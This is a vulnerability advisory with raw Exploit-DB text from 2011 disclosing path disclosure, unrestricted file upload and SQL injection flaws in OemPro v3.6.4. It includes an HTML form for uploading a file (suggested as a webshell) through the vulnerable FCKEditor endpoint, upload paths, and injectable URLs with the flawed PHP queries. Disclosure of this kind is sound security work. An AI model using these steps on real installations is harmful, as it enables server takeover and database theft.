Multiple vulnerabilities on OemPro

vendor:

OemPro

by:

Ignacio Garrido

7.5

CVSS

HIGH

Path disclosure, File upload vulnerability, SQL Injection

79, 434, 89

CWE

Product Name: OemPro

Affected Version From: v3.6.4

Affected Version To: v3.6.4

Patch Exists: NO

Related CWE: N/A

CPE: a:octeth:oempro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows 2003

2011

Multiple vulnerabilities on OemPro

Multiple vulnerabilities have been found in OemPro v3.6.4 and probably prior versions. Path disclosure vulnerability exists in cli_bounce.php. File upload vulnerability exists in fckeditor/editor/filemanager/upload/php/upload.php?Type=Media, which can be exploited to bypass any kind of restriction when uploading a media file. SQL Injections have been found in link.php, html_version.php and archive.php.

Mitigation:

Ensure that all user-supplied input is properly validated and filtered before being used in SQL queries. Ensure that all user-supplied input is properly validated and filtered before being used in file uploads. Ensure that sensitive information is not disclosed.

Source

Exploit-DB raw data:

# Exploit title: Multiple vulnerabilities on OemPro
# Product: OemPro
# Version Affected: v3.6.4 and probably prior.
# Date: 03/02/2011
# Author: Ignacio Garrido
# Vendor: http://octeth.com
# Tested on: Linux - Windows 2003
# Mail: Ign.sec@gmail.com

# Path disclosure:
http://localhost/cli_bounce.php

# FCKEditor 2.3.2 is used, file upload vulnerabilities have been found
before (Credits to grabz), making possible to bypass any kind of restriction
when uploading a media file.
# A malintentioned user could exploit this flaw to upload a webshell. Perms
to create a folder are needed though.
# Vulnerable file:
http://localhost/system/data/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media
# Possible upload path:
http://localhost/system/data/user_uploads/Image/
http://localhost/user_uploads/image/

# Exploit:
<form enctype="multipart/form-data" action="
http://localhost/system/data/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="Subir">
</form>


# Several SQL injections have been found all the encoded input data it's
only being decoded but not properly filtered.
# A few examples:

# link.php, line 123 to 126
http://localhost/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]

    $SQLQuery = "SELECT * FROM ".$ArrayConfig['Database']['Prefix']."members
WHERE MemberID='".$MemberID."'";
    $ResultSet = ExecuteMySQLQuery($SQLQuery);
    $ArrayMember = mysql_fetch_assoc($ResultSet);

# html_version.php, line 43 to 48
http://localhost/html_version.php?ECID=[SQL]

    $EncryptedCampaignID    = ($_GET['ECID'] == '' ?
$_POST['FormValue_ECID'] : $_GET['ECID']);

        if ($EncryptedCampaignID != '')
            {
            $CampaignID = base64_decode(rawurldecode($EncryptedCampaignID));
            $PublicDisplay = true;
            }

# archive.php
http://localhost/archive.php?ArchiveID=

    $ArchiveListID            = ($_GET['ArchiveID'] == '' ?
$_POST['FormValue_ArchiveID'] : $_GET['ArchiveID']);
    $ArchiveListID        = base64_decode($ArchiveListID);

    $SQLQuery ="SELECT * FROM
".$ArrayConfig['Database']['Prefix']."archive_list WHERE
ArchiveListID='".$ArchiveListID."'";
    $ResultSet = ExecuteMySQLQuery($SQLQuery);
    $ArrayArchive = mysql_fetch_assoc($ResultSet);